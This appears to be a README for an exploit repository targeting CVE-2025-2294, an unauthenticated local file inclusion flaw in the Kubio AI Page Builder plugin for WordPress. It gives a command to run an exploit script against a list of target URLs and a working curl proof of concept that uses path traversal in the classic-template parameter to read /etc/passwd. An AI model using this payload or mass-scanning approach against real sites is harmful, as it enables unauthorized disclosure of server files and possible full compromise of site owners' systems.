# CVE-2025-2294
# 🚨 CVE-2025-2294 - Local File Inclusion (LFI) Vulnerability in Kubio AI Page Builder for WordPress 🧱
## 🔍 Overview
**CVE-2025-2294** is a critical 🔥 Local File Inclusion (LFI) vulnerability affecting the Kubio AI Page Builder plugin for WordPress (versions up to and including 2.5.1). This flaw allows **unauthenticated remote attackers** 👾 to include arbitrary files on the server via the `__kubio-site-edit-iframe-classic-template` URL parameter.
Exploiting this vulnerability may lead to disclosure of sensitive files 📂, remote code execution 💥, and full system compromise 💀.
## 👤 Author
**Muhammad Nizar** — Security Researcher 🔐
GitHub: [0xWhoami35](https://github.com/0xWhoami35)
YouTube: [InfoSec Insight](https://www.youtube.com/channel/UC33gQFGBqkqDE0zZNwamCgw) ▶️
---
*Feel free to reach out for questions or collaboration! 🤝*
---
## 📋 Affected Versions
- Kubio AI Page Builder plugin ≤ 2.5.1 🛠️
---
## 🧰 Usage
Run the exploit script with a list of target URLs:
```bash
python3 lfi.py -l list.txt
```
## ⚠️ Vulnerability Details
- **Type:** Local File Inclusion (LFI) 🕳️
- **Severity:** Critical (CVSS 9.8) 🔥
- **Attack Vector:** Remote, unauthenticated 🌐
- **Impact:** Confidentiality, Integrity, Availability 🔐
---
## 🧪 Proof of Concept (PoC)
```bash
curl "https://target-website.com/?__kubio-site-edit-iframe-preview=true&__kubio-site-edit-iframe-classic-template=../../../../../../../etc/passwd"
[4.0K] /data/pocs/8458218114e7ea1e6481c89a71f567e4ceee0521
├── [4.6K] lfi.py
└── [1.5K] README.md
0 directories, 2 files